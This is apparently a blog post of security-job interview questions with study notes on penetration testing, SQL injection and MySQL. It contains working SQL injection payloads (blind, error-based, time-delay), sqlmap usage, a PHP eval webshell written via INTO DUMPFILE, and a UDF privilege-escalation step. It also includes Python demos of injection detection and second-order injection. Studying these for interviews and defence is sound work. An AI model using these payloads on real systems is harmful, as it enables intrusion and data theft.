Network security job interview questions and interview experience sharing! Three days and three nights of hard work went into sorting this out, and it is absolutely the most complete collection!

1. ByteDance - Penetration Testing Intern

  • Self-introduction
  • The penetration testing process
  • How to handle wildcard DNS resolution when brute-forcing subdomains during information gathering
  • How to bypass a CDN to find the real IP
  • What information do you look at in phpinfo
  • Have you heard of persistence (maintaining access)?
  • Tell me about a vulnerability you are proud of, and talk it through
  • How to defend against XSS where the output lands in an href
  • The principle of SameSite as a defense against CSRF
  • CSRF defenses
  • How to defend against CSRF with JSON-format requests
  • Browser parsing order and decoding order
  • How to bypass SQL injection filtering of commas
  • How to bypass filtering of the comma after LIMIT
  • fastjson-related vulnerabilities
  • Talk about a Python-related vulnerability you know (SSTI principle, exploitation process, payload-related details); open-ended question and answer

2. Sangfor - Vulnerability Researcher Internship

  • Self-introduction
  • What did you do during your internship at xx
  • Briefly explain the approach to penetration testing
  • What role does HVV (the network protection exercise) play in it?
  • Some thoughts on red teaming
  • Did you do lateral movement after taking down a system?
  • Did you research log4j recently? Can you briefly talk about it?
  • (Following the previous question) What are the ways to bypass obfuscation
  • Do you understand memory webshells (in-memory Trojans)?
  • Have you heard of tools like Behinder (Ice Scorpion) and Godzilla?
  • Did you study any attacks when you were on the attack team, such as researching or modifying some tools?
  • With so many vulnerabilities and attacks, which one are you best at?
  • Talk about the cause of Shiro deserialization and its gadget chain
  • Have you learned about some bypass methods? Can you briefly introduce the techniques?
  • Questions

3. ByteDance - Security Research Intern

  • The position you applied for is security research intern. Do you know what we mainly do here?
  • Self-introduction
  • Is there a direction you want to work in now? For example, the code audit you wrote about, offensive and defensive drills, and your research direction at school (cryptography) are actually three major directions. Is there one you want to do now?
  • Have you audited open-source frameworks, CMSs, middleware, etc.?
  • The interviewer introduced the job content
  • I see several internship experiences and project experiences on your resume. Let's talk about the internship experience first. What did you mainly do at A?
  • Talk in detail about what the intrusion detection work mainly involved and the problems encountered
  • Have you analyzed the reasons for the large number of false positives generated by intrusion detection, and is there a better solution?
  • Compared with A, B should be more offensive, right? There are HVV exercises (hazy; this seems to be what the interviewer said) and code audits. Let's talk about what you mainly did at B.
  • The steps and ideas for auditing the expression engine
  • The audit you just mentioned sounds similar to an ordinary development review, done through program flow and documents. Have you audited projects from a security perspective?
  • How XXE arises, at the code level
  • I see your resume has a lot of offensive and defensive drill experience, right? Is there one that is more impressive? Pick one and talk about it
  • It seems your attacks mostly relied on weak passwords. Do you have some more skillful methods?
  • How was the webshell uploaded through the avatar upload?
  • What other ways of testing are there? How to bypass it?
  • The log4j vulnerability is very popular these past two days, have you looked at it?
  • Finally, the interviewer introduces the business
  • Questions

4. Chaitin Technology - Security Service Engineer

  • Self-introduction
  • Have you practiced web penetration testing?
  • Talk about the principle of SQL injection
  • Do you understand the cause of SQL injection at the code level (if "code level" means the SQL statement, the answer is yes)
  • If you don't understand XSS well, do you understand the principle of XSS at the code level
  • Which of the OWASP Top 10 vulnerabilities are you most familiar with
  • Talk about how to defend against SQL injection
  • How does SQL injection bypass filtering
  • Asked whether xx was a target during HVV, and whether I had done any analysis and judgment of the attacking team's behavior
  • The content of the HVV work at xx; have you done analysis and judgment on traffic and data packets?
  • The role played in the school's offensive and defensive drills, the main work, the penetration testing approach, and the results (this question was quite detailed, down to the assigned tasks, whether hosts or the domain controller were taken down, and the form and duration of the drills)
  • You usually play a lot of CTF; what results have you achieved?
  • Do you usually follow novel vulnerabilities, and do you do code audits, e.g. Shiro vulnerabilities? Have you reproduced vulnerabilities?
  • Do you know anything about phishing emails?
  • What is your current direction of study
  • Finally, an introduction to the talent requirements
  • Questions

5. Tencent - Security Technology Intern

  • Self-introduction
  • Do you understand SQL injection? Tell me about the principle of second-order injection
  • How to fix second-order injection
  • Do you understand SQL injection WAF bypass? If a SQL injection filter blocks the "information" keyword, how do you bypass it?
  • Redis unauthorized access
  • A complete penetration testing process
  • When playing CTF, did you encounter any particularly impressive challenges?
  • Is there a better way to exploit a file download vulnerability?
  • Using a file download vulnerability to find file names: specifically, which file names to look for (which files are generally read when reading files) (in CTF? in real engagements?)
  • Command execution vulnerability: what is the better approach when an HTTP callback cannot get out (say a bit more)
  • Continuing from the previous question, communicating through tunnels: explain in detail what types of tunnels are used, and talk about the specific operations
  • Vulnerability early warning
  • Have you reproduced a middleware-type vulnerability (have you reproduced a complete vulnerability)
  • What were the main responsibilities of the role played in the school's offensive and defensive drills?

6. Xpeng Motors - Security Engineer

  • Self-introduction
  • Have you ever submitted findings to an SRC (security response center)?
  • How do you usually learn web penetration? Any real-world practice? Have you successfully found a vulnerability?
  • What tools have you used when doing web penetration
  • What is the XXE vulnerability? What is SSRF?
  • When playing CTF, what category are you responsible for?
  • Why do you want to work in information security, how interested are you in security, will you change careers in the future, or do you plan to keep working in security
  • How do you usually learn about security? If you were asked to take a new direction (app security), how much time would you spend learning, or do you have a direction you want to do?
  • Talk about the process of code auditing
  • How do you usually do code auditing?
  • Have you audited open-source frameworks and CMSs?
  • How to judge whether a database is MySQL or Oracle?
  • Types of SQL injection and how to exploit them?
  • Talk about the principle of SQL injection and defense ideas
  • What language did you use for development?
  • What framework did you use for Java development? Can you do secure Java development?
  • Have you done Android development?
  • Have you written a tool in Python?
  • Which vulnerability did you use with msf, and did you successfully get a reverse shell?
  • What did you mainly do during HVV, and talk about your understanding of security products
  • The company now needs someone who can do app security. If you were asked to do it now, would you learn it, are you interested, or do you have other things you want to do? If you don't want to do app security, how much time could you spend learning it
  • Do you understand intranet penetration? Talk about the approach to intranet penetration

7. Summary of high-frequency interview questions at major companies

This time I spent three months sorting out the interview questions for network security service positions at major security vendors (including but not limited to: security service engineer, security operations engineer, security operations and maintenance engineer, security attack and defense engineer).

Without further ado, let's learn together.

At present there is still a lot of imprecision and redundancy, and I ask my friends to correct and amend it!


7.1. SQL injection protection method

  • Broken authentication and session management
  • Cross-site scripting (XSS)
  • Insecure direct object references
  • Security misconfiguration
  • Sensitive information exposure
  • Missing function-level access control
  • Cross-site request forgery (CSRF)
  • Using components with known vulnerabilities
  • Unvalidated redirects and forwards

7.2. Common Web Security Vulnerabilities

  • SQL injection
  • XSS
  • File traversal, file upload, file download
  • Vertical privilege escalation, horizontal privilege escalation
  • Logic vulnerabilities

First of all, for newcomers: most students have no real-world experience. In response to the interviewer's questions they are expected to talk about their actual penetration testing, but many people have nothing to say.

7.3. Given a website, how do you perform penetration testing?

Subject to written authorization.

1) Information gathering

Obtain the domain's whois information: the registrant's email address, name, phone number, etc.

Query sites hosted on the same server (side sites) and subdomain sites; because the main site is generally harder, first check whether the side sites run a common CMS or have other vulnerabilities.

Check the server operating system version and web middleware for known vulnerabilities, such as the IIS, Apache and Nginx parsing vulnerabilities.

Check the IP, scan the IP's ports, and probe the services on the corresponding ports for vulnerabilities, such as rsync, Heartbleed, MySQL, FTP, SSH weak passwords, etc.

Scan the website's directory structure to see whether directories can be listed or sensitive files are exposed, such as PHP probes.

Use Google hacking to further discover website information, admin backends, and sensitive files.

2) Vulnerability scanning

Start probing for vulnerabilities, such as XSS, CSRF, SQL injection, code execution, command execution, unauthorized access, directory listing, arbitrary file read and download, file inclusion, remote command execution, weak passwords, file upload, editor vulnerabilities, brute-force cracking, etc.

3) Exploitation

Use the above to obtain a webshell or other privileges.

4) Privilege escalation

Escalate privileges on the server, e.g. MySQL UDF privilege escalation on Windows, Serv-U privilege escalation, vulnerabilities in older Windows versions such as IIS6, pr and Churrasco ("Brazilian barbecue"); on Linux, Dirty COW, kernel version vulnerabilities, MySQL system privilege escalation, and Oracle low-privilege escalation.

5) Log cleanup

6) Summary report and remediation plan

7.4. Penetration testing process

  • Project interview
  • Information gathering: whois, website origin IP, side sites, C-segment websites, server OS version, container version, program version, database type, second-level domain names, firewall, maintainer information
  • Vulnerability scanning: Nessus, AWVS
  • Manual digging: logic vulnerabilities
  • Validating vulnerabilities
  • Remediation suggestions
  • (If any) baseline check / retest of vulnerabilities
  • Output report
      • Overview
      • Basic test information
      • Test scope
      • Test time
      • Test tasks
      • Testing process
      • Comprehensive information security risk analysis
      • Overall risk analysis
      • Risk impact analysis
      • System security analysis
      • List of security vulnerabilities
      • Solution suggestions
  • Retest report

SQL interview questions

7.5. Types of SQL Injection

  • Error-based injection
  • Boolean-based blind injection: whether the condition is true or false is judged from the returned page
  • Time-based blind injection: nothing can be judged from the page content, so conditional statements are used to check whether a time-delay statement executed (that is, whether the page's response time increased)
  • Wide-byte injection
  • Union query injection, possible where UNION can be used
  • Stacked query injection, which can execute multiple statements at once

7.6. The principle of SQL injection

By inserting SQL commands into web form submissions or into the query string of a domain name or page request, the attacker ultimately tricks the server into executing malicious SQL commands. It usually happens because user input is unchecked or insufficiently checked, or because of coding mistakes, so that data is inadvertently executed as code.

7.7. How to defend against SQL injection

  • Turn off application error messages
  • Add a WAF
  • Filter the input
  • Limit input length
  • Restrict database permissions, and grant permissions such as DROP/CREATE/TRUNCATE carefully
  • Precompile SQL statements, generally using ? as a placeholder in Python and PHP. This approach addresses SQL injection from the programming framework's side by passing parameters through placeholders, and it can only be said to prevent injection to a certain extent; there are still buffer overflows, terminator characters, etc.
  • Encryption and security of database information (this leads into cryptography). Do not use plain MD5 because of rainbow tables; generally hash with MD5 once, add a salt, and hash again
  • Clear coding standards, pair/automated code review, and a large number of ready-made solutions (PreparedStatement, ActiveRecord, filtering of ambiguous characters, access only through stored procedures, and so on) have made the risk of SQL injection very low.
  • How to prevent injection in a specific language and what security framework to use

7.8. sqlmap: how do you inject at an injection point?

  • If it is a GET request, directly: sqlmap -u "injection point URL"
  • If it is a POST injection point, use sqlmap -u "injection point URL" --data="POST parameters"
  • If the injection point is in a cookie, X-Forwarded-For, etc., use Burp Suite to capture the request, replace the injection position with *, save it to a file, and then run sqlmap -r "file path"

7.9. What is the difference between injection on MySQL above 5.0 and below 5.0?

5.0 was released 10 years ago and the current version is 5.7, so the distinction is of little practical significance.

Below 5.0 there is no information_schema system database, so table names etc. cannot be listed and can only be brute-forced.

Below 5.0 is multi-user single-operation; above 5.0 is multi-user multi-operation.

7.10. MySQL storage engines?

1. InnoDB: the mainstream storage engine. Supports transactions, row locks, non-locking reads, and foreign key constraints.

Provides MySQL with a transaction-safe (ACID-compliant) storage engine with commit, rollback, and crash-recovery capabilities. InnoDB locks at the row level and also provides Oracle-like non-locking reads in SELECT statements. These features improve multi-user deployment and performance. In SQL queries, InnoDB tables can be freely mixed with other MySQL table types, even in the same query.

The InnoDB storage engine maintains its own buffer pool for caching data and indexes in main memory. InnoDB organizes its tables and indexes in a logical tablespace, which can consist of several files (or raw disk partitions). This differs from MyISAM tables, for example, where each table is stored in separate files. InnoDB tables can be of any size, even on operating systems where file sizes are limited to 2GB.

InnoDB supports foreign key integrity constraints. When storing data, each table is stored in primary key order. If no primary key is specified when the table is defined, InnoDB generates a 6-byte ROWID for each row and uses it as the primary key.

2. MyISAM: fast access, does not support transactions, and is gradually being phased out.

3. MEMORY: BTREE or HASH index. Keeps the table's data in memory; concurrency performance is poor.

4. MERGE, Archive, etc. are not commonly used.

7.11. What is a transaction?

A transaction is a set of atomic SQL statements, an independent unit of work. If the database engine can successfully apply the whole set of statements to the database, they are all executed; if any statement cannot be executed because of a crash or other reason, none of the statements take effect. In other words, the statements in a transaction either all succeed or all fail.

A typical banking example:

Suppose the bank's database has two tables: a checking table and a savings table. Customer A wants to transfer 2,000 yuan from the checking account to the savings account, which takes at least three steps:

a. Check that the balance of A's checking account is higher than 2,000 yuan;

b. Subtract 2,000 yuan from A's checking account balance;

c. Add 2,000 yuan to A's savings account balance.

These three steps must be packaged in one transaction. If any step fails, all steps must be rolled back; otherwise A, as a bank customer, could inexplicably lose 2,000 yuan. This is a typical transaction: the smallest indivisible unit of work. All operations in the transaction are either committed successfully or rolled back on failure; it is impossible to execute only part of them. This is the atomicity property of a transaction.
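To make the three-step transfer concrete, here is an added Python example (not from the original post) using an in-memory SQLite database: a constructed checking/savings schema, the transfer run as three independent statements, and the same transfer wrapped in one transaction, with a failure at step c forced by removing the savings row.

```python
import sqlite3

def open_bank(checking_balance=5000, savings_balance=1000):
    """Constructed schema for the example: the checking and savings tables from the text.
    The CHECK constraint makes the database itself reject a negative balance."""
    conn = sqlite3.connect(":memory:")
    conn.isolation_level = None  # no implicit transactions: BEGIN/COMMIT/ROLLBACK are explicit
    conn.executescript("""
        CREATE TABLE checking (owner TEXT PRIMARY KEY,
                               balance INTEGER NOT NULL CHECK (balance >= 0));
        CREATE TABLE savings  (owner TEXT PRIMARY KEY,
                               balance INTEGER NOT NULL CHECK (balance >= 0));
    """)
    conn.execute("INSERT INTO checking VALUES ('A', ?)", (checking_balance,))
    conn.execute("INSERT INTO savings VALUES ('A', ?)", (savings_balance,))
    return conn

def balances(conn, owner="A"):
    """Return (checking, savings) balances; None where the account row is missing."""
    chk = conn.execute("SELECT balance FROM checking WHERE owner = ?", (owner,)).fetchone()
    sav = conn.execute("SELECT balance FROM savings WHERE owner = ?", (owner,)).fetchone()
    return (chk[0] if chk else None, sav[0] if sav else None)

def _steps(conn, owner, amount):
    """Steps a, b and c from the text; raises on any failure."""
    row = conn.execute("SELECT balance FROM checking WHERE owner = ?", (owner,)).fetchone()
    if row is None or row[0] < amount:                          # step a
        raise ValueError("insufficient funds")
    conn.execute("UPDATE checking SET balance = balance - ? WHERE owner = ?",
                 (amount, owner))                                # step b
    cur = conn.execute("UPDATE savings SET balance = balance + ? WHERE owner = ?",
                       (amount, owner))                          # step c
    if cur.rowcount != 1:
        raise LookupError("savings account not found")

def transfer_unsafe(conn, owner, amount):
    """The three steps as independent autocommit statements: if step c fails,
    step b has already been applied and the money is gone."""
    try:
        _steps(conn, owner, amount)
        return True
    except Exception:
        return False

def transfer(conn, owner, amount):
    """The same steps inside one transaction: all committed or all rolled back."""
    conn.execute("BEGIN")
    try:
        _steps(conn, owner, amount)
        conn.execute("COMMIT")
        return True
    except Exception:
        conn.execute("ROLLBACK")
        return False

if __name__ == "__main__":
    bank = open_bank()
    print(transfer(bank, "A", 2000), balances(bank))           # True (3000, 3000)
    bank.execute("DELETE FROM savings")                         # make step c fail
    print(transfer(bank, "A", 1000), balances(bank))           # False (3000, None): rolled back
    bank2 = open_bank()
    bank2.execute("DELETE FROM savings")
    print(transfer_unsafe(bank2, "A", 2000), balances(bank2))  # False (3000, None): 2000 lost
```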

7.12. Read locks and write locks

Read locks are shared: they do not block each other, so multiple clients can read the same resource at the same time without interfering with one another. Write locks are exclusive: a write lock blocks other write locks and read locks. Only in this way can it be ensured that a single user is writing at any given time, and that other users cannot read a resource while it is being written. Write locks have higher priority than read locks.

7.13. MySQL indexes

An index is a data structure that helps MySQL retrieve data efficiently. The MyISAM and InnoDB storage engines only support BTree indexes; the MEMORY and HEAP storage engines support both HASH and BTREE indexes.

7.14. Use of ORDER BY in injection

A field name, an expression, or a field position can follow ORDER BY, and a field position must be an integer.

7.15. What is GPC? How to bypass after GPC?

If magic_quotes_gpc=On, the PHP parser automatically adds the escape character "\" to data from POST, GET and cookies, so that special characters in that data do not pollute the program, and in particular database statements.

7.16. What is the difference between one @ and two @ in MySQL

@ denotes a user variable; assign with SET @var1=1.

@@ denotes system variables, including global variables (SHOW GLOBAL VARIABLES\G) and session variables (SHOW SESSION VARIABLES\G).

7.17. Commonly used functions for injection/bypass

1. Boolean-based blind SQL injection

left(database(),1)>'s'

ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

REGEXP (regular-expression) injection: select user() regexp '^[a-z]';

select user() like 'ro%'

2. Error-based SQL injection

  • 1) and extractvalue(1, concat(0x7e,(select @@version),0x7e))
  • 2) floor() error-based injection
  • 3) and updatexml(1, concat(0x7e,(select @@version),0x7e),1)
  • 4) geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
  • 5) multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
  • 6) polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
  • 7) multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
  • 8) linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
  • 9) multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
  • 10) exp(): select * from test where id=1 and exp(~(select * from(select user())a));

3. How to test for time-delay injection?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)
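As an added defensive example, not part of the original post, the following Python snippet turns the functions listed above into detection signatures and runs them over a few constructed access-log lines; the combined log format, the URL-decoding steps and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures built from the functions listed above. Each one requires the function-call
# form (name followed by "(") so that ordinary words such as "sleeping" do not match.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:ascii|ord|substr|substring|mid|left)\s*\(", re.I),
    "error-based": re.compile(
        r"\b(?:extractvalue|updatexml|geometrycollection|multipoint|polygon"
        r"|multipolygon|linestring|multilinestring|exp)\s*\(", re.I),
    "time-blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.", re.I),
    "regex-probe": re.compile(r"\b(?:regexp|rlike|like)\s+'", re.I),
}

def normalize(raw_query):
    """URL-decode the query string twice (double encoding is a common evasion) and lowercase it."""
    text = raw_query
    for _ in range(2):
        text = unquote_plus(text)
    return text.lower()

def classify(raw_query):
    """Return the sorted signature names that fire on one request's query string."""
    text = normalize(raw_query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

# Combined log format: ip ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def scan_log(lines):
    """Parse combined-format lines and return (ip, path, hits) for requests that match."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        hits = classify(path.partition("?")[2])
        if hits:
            findings.append((m.group("ip"), path, hits))
    return findings

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%20and%20ascii(substr(database(),1,1))=98 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e)) HTTP/1.1" 500 210',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=1%20and%20if(1=1,sleep(5),1) HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /search.php?q=sleeping+bags HTTP/1.1" 200 3071',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, path)
```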

7.18. What do blind injection and time-delay injection have in common?

Both judge the result character by character.

7.19. How to get a webshell on a website?

File upload, editing templates in the admin backend, writing files via SQL injection, command execution, code execution.

Some CMSs have known vulnerabilities, e.g. the DedeCMS backend can directly create script files, a WordPress plugin upload can contain script files inside the zip archive, etc.

7.20. What functions does SQL injection use to write files?

select 'statement' into outfile 'path'

select 'statement' into dumpfile 'path'

select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

7.21. Various shell-writing questions

1. What functions are used to write a shell?

select '<?php phpinfo(); ?>' into outfile 'D:/shelltest.php'

dumpfile

file_put_contents

2. What if outfile cannot be used?

select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll'; then UDF privilege escalation is possible

3. What is the difference between dumpfile and outfile?

outfile is suited to exporting data: it writes a newline at the end of each line and escapes characters, so it cannot write a binary executable.

4. Can sleep() write a shell?

5. What are the conditions for writing a shell?

User privileges

Directory read and write permissions

Command execution prevention: disable_functions, e.g. disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source, but commands may still be executed through the dl() extension loader, an ImageMagick vulnerability, and so on

open_basedir: restricts the files a user can operate on to a given directory

7.23. SQL second-order injection

When data is first inserted into the database, only addslashes or get_magic_quotes_gpc escaping of special characters is applied. The data written to the database retains its original form, so the stored data itself is still dirty.

After the data is stored, the developer considers it trustworthy. When the next query is needed, the dirty data is taken directly from the database without further inspection or processing, which causes SQL second-order injection.

On a dating website, the age field is an injection point, and the page displays how many users are the same age as you. Use and 1=1 to confirm the injection point, ORDER BY to determine the number of columns, and UNION SELECT to find which column is echoed.

Dump databases: group_concat(schema_name) from information_schema.schemata

Dump tables: group_concat(table_name) from information_schema.tables where table_schema='hhh'

Get data: concat(flag) from flag

Fix: escaping or filtering should also be performed when fetching data from a database or file.
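The following is an added Python example (not code from the original post) that reproduces the escape-on-insert, trust-on-read pattern described above with an in-memory SQLite database: the escaped INSERT blocks the first-order injection covered in 7.6 and 7.7, but a password-change query that splices in the stored username is still injectable, and the parameterized version is not. The table, the addslashes stand-in and the usernames are constructed for the example.

```python
import sqlite3

def addslashes(s):
    """Stand-in for PHP's addslashes/magic_quotes_gpc: escape the quote so the string can be
    spliced into a quoted literal. SQLite escapes ' by doubling it (MySQL would use \\')."""
    return s.replace("'", "''")

def open_db():
    # Constructed schema: one pre-existing account whose password the attacker wants to reset.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn

def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None

# --- vulnerable flow: escaped on the way in, trusted on the way out ----------------
def register_vuln(conn, username, password):
    # Escaping makes this INSERT itself safe, but what lands in the table is the
    # original string, quote and all: the database now holds "dirty" data.
    conn.execute("INSERT INTO users VALUES ('%s', '%s')"
                 % (addslashes(username), addslashes(password)))
    conn.commit()

def change_password_vuln(conn, username, old_pw, new_pw):
    # The username is read back from the database and, because it "came from the
    # database", spliced into the next statement without escaping.
    row = conn.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return 0
    sql = ("UPDATE users SET password = '%s' WHERE username = '%s' AND password = '%s'"
           % (addslashes(new_pw), row[0], addslashes(old_pw)))
    # With the stored name admin'-- this becomes
    #   ... WHERE username = 'admin'--' AND password = '...'
    # and SQLite treats everything after -- as a comment, dropping the password check.
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount

# --- fixed flow: parameterize every statement, including those fed from the database ---
def change_password_fixed(conn, username, old_pw, new_pw):
    cur = conn.execute("UPDATE users SET password = ? WHERE username = ? AND password = ?",
                       (new_pw, username, old_pw))
    conn.commit()
    return cur.rowcount

if __name__ == "__main__":
    db = open_db()
    register_vuln(db, "admin'--", "attacker")          # first-order injection: blocked
    change_password_vuln(db, "admin'--", "attacker", "pwned")
    print(password_of(db, "admin"))                    # pwned: admin's password was reset
    db = open_db()
    register_vuln(db, "admin'--", "attacker")
    change_password_fixed(db, "admin'--", "attacker", "pwned")
    print(password_of(db, "admin"))                    # S3cret!: only the attacker's own row changed
```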

7.24. Difference between SQL and NoSQL

SQL: relational databases. NoSQL (Not only SQL): non-relational databases.

1. Advantages of SQL

A relational database represents data using the relational mathematical model, in which data is described in the form of two-dimensional tables.

The structure is stable and not easily modified; commonly used for joined-table queries

Strong query capability; very complex queries can be expressed

High consistency; locks are used while processing data to ensure it is not changed underneath

Tables are logical and easy to understand

2. Disadvantages of SQL

Not suited to highly concurrent reading and writing

Not suited to efficient reading and writing of massive amounts of data

Many layers, low scalability

Maintaining consistency is expensive

Joined-table queries are complex and slow

3. Advantages of NoSQL

Stores data as key-value pairs

Since there are no relationships between data items, it is easy to scale and query

The data structure is flexible; each record can have a different structure

Queries are faster because of the reduced consistency requirements

4. Comparison

Non-relational databases emerged because, as websites evolved, concurrency increased, scalability demands grew, and consistency requirements dropped. The consistency maintenance that is the most important feature of relational databases then became somewhat redundant and costly in performance. A non-relational database can therefore be regarded as a weakened relational database that is better at storing and querying massive amounts of data.

Neither kind of database is better in absolute terms; they are simply used in different environments. A relational database is the more rigorous and reliable choice: in environments demanding high data accuracy, such as a banking system, a database like MySQL is the natural fit. Non-relational databases are superior at processing big data quickly, but with lower data accuracy, and suit environments with a large volume of operations, such as most current Web 2.0 websites.


Recommendation

From blog.csdn.net/2301_77732591/article/details/130765643